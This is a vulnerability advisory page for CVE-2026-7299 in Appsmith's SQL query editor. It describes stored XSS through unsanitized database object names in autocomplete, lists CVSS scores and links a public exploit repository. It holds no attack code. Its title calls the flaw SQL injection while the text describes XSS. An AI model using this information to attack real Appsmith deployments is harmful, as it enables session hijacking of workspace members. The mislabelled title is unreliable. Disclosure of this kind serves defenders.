SQL Injection Vulnerability in Appsmith's SQL Query Editor
CVE-2026-7299

6.3MEDIUM

Key Information:

Vendor: Appsmith
Status: Appsmith
Vendor: CVE Published:; 2 June 2026

What is CVE-2026-7299?

The SQL query editor in Appsmith contains a vulnerability that arises from the failure to properly sanitize database object names in its autocomplete functionality. This shortcoming allows an authenticated user to introduce malicious code through persistent XSS. When this occurs, it can lead to arbitrary code execution during sessions of other workspace members interacting with the compromised datasource. This vulnerability highlights the importance of input validation and sanitization within development tools.

Affected Version(s)

Appsmith 0 < 2.1

References

https://github.com/appsmithorg/appsmith/security/advisori...

https://github.com/appsmithorg/appsmith/pull/41666

https://github.com/Stuub/Appsmith-1.98-Stored-XSS-Exploit

CVSS V3.1

Score:

6.3

Severity:

MEDIUM

Confidentiality:

High

Integrity:

Low

Availability:

High

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

Low

User Interaction:

Required

Scope:

Unchanged

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Jun 2, 2026
Vulnerability Reserved
Apr 28, 2026

CVE-2026-7299 Data

JSON